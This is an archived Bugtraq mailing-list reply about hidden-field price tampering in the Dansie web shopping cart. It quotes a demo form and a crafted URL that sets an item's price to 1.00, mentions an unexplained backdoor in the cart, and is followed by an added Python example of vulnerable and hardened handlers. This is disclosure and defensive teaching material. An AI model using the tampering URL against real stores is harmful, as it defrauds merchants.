[14532] in bugtraq
Re: more problems with that POS dansie cart software!
daemon@ATHENA.MIT.EDU (Pete Holsberg)
Sun Apr 16 21:43:48 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.10.10004161843531.1447-100000@tecoma.mccc.edu>
Date: Sun, 16 Apr 2000 18:45:58 -0400
Reply-To: pjh@mccc.edu
From: Pete Holsberg <pjh@MCCC.EDU>
X-To: tombow <juice@3SHEEP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.GSO.4.05.10004141056510.8165-100000@los-angeles.mtvnodn.com>
On Fri, 14 Apr 2000, tombow wrote:
> if installing a backdoor in the cart software wasn't bad enough.. the
> whole implementation of pricing and adding items to cart is crap..
>
> example form to add items to your cart (kindly provided on the publishers
> site using the demo cart they set up for us):
>
> *snip*
>
> <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
>
> Black Leather purse with leather straps<BR>
> Price: $20.00<BR>
>
> <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
> <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling -->
> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
> <INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
>
> <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
> </FORM>
>
> *snip*
>
>
> a couple of quick alterations and we can now add:
>
> one piece of crap cart software..
>
> http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
>
This occurs because the person who configured the script
failed to set "personal variable #66". Dansie has since
done that at www.dansie.net so that the above URL now fails
to change the shopping cart variables.
Pete
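The tampering tombow describes, worked through as an added example (this is not Dansie's cart.pl and not code from either poster): a handler that trusts the hidden `price`/`sh` fields, next to two hardened forms, one that looks the price up server-side from a catalog and one that keeps the price in the form but binds it with an HMAC. The catalog, the merchant secret and every function name here are assumptions for illustration; the query string is the one quoted in the post.

```python
"""Hidden-field price tampering in a web cart: vulnerable handler beside two
hardened ones.  Added example, not code from Dansie's cart.pl; the catalog,
merchant secret and function names are assumptions for illustration.  The
query string is the one quoted in the post."""
import hashlib
import hmac
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs, urlsplit

# Constructed catalog: the only prices the server should ever bill.
CATALOG = {
    "Black leather purse": {"price": Decimal("20.00"), "sh": Decimal("1.00")},
}

# Assumed per-merchant secret for the signed-form variant (not a real key).
MERCHANT_SECRET = b"assumed-merchant-secret"
SIGNED_FIELDS = ("name", "price", "sh")

# The tampered request from the post: the client rewrote price to 1.00.
ATTACK_URL = (
    "http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software"
    "&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html"
    "&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables"
)


def parse_request(url):
    """Flatten the query string to single values, as a CGI script sees a form post."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}


def add_to_cart_vulnerable(fields):
    """Pattern in the quoted form: name, price and shipping all come from the
    client, so the buyer sets their own price."""
    return {"name": fields["name"], "price": Decimal(fields["price"]), "sh": Decimal(fields["sh"])}


def add_to_cart_hardened(fields):
    """Preferred fix: the form only names the item; price and shipping are
    looked up server-side, and unknown items are refused."""
    item = CATALOG.get(fields.get("name", ""))
    if item is None:
        raise ValueError("unknown item")
    return {"name": fields["name"], "price": item["price"], "sh": item["sh"]}


def sign_fields(fields):
    """HMAC-SHA256 over the price-bearing fields, keyed with the merchant secret."""
    msg = "\x1f".join(fields[k] for k in SIGNED_FIELDS).encode()
    return hmac.new(MERCHANT_SECRET, msg, hashlib.sha256).hexdigest()


def make_signed_form(name):
    """Server-side emitter for merchants who must keep the price in the form:
    hidden fields plus a signature the client cannot forge without the secret."""
    item = CATALOG[name]
    fields = {"name": name, "price": str(item["price"]), "sh": str(item["sh"])}
    fields["sig"] = sign_fields(fields)
    return fields


def add_to_cart_signed(fields):
    """Alternative fix: accept form-carried prices only when the signature over
    them verifies; editing any signed field invalidates it."""
    if not hmac.compare_digest(sign_fields(fields), fields.get("sig", "")):
        raise ValueError("form fields tampered")
    return {"name": fields["name"], "price": Decimal(fields["price"]), "sh": Decimal(fields["sh"])}


def rejects(handler, fields):
    """True if the handler refuses the request (shows the fixes doing their job)."""
    try:
        handler(fields)
    except (ValueError, KeyError, InvalidOperation):
        return True
    return False


if __name__ == "__main__":
    attack = parse_request(ATTACK_URL)
    print("vulnerable bills:", add_to_cart_vulnerable(attack)["price"])  # 1.00
    print("hardened rejects unknown item:", rejects(add_to_cart_hardened, attack))  # True
    renamed = dict(attack, name="Black leather purse")
    print("hardened bills catalog price:", add_to_cart_hardened(renamed)["price"])  # 20.00
    good = make_signed_form("Black leather purse")
    print("signed accepts untouched form:", add_to_cart_signed(good)["price"])  # 20.00
    print("signed rejects edited price:", rejects(add_to_cart_signed, dict(good, price="1.00")))  # True
```

The catalog lookup is the fix to prefer: the client then chooses only which item to add and the server never reads a price from the request. The signed-form variant is for a hosted cart that cannot hold the merchant's catalog; note it still lets the client replay any form the merchant ever published, so a price change on the merchant's side needs a secret rotation or an expiry field inside the signed data.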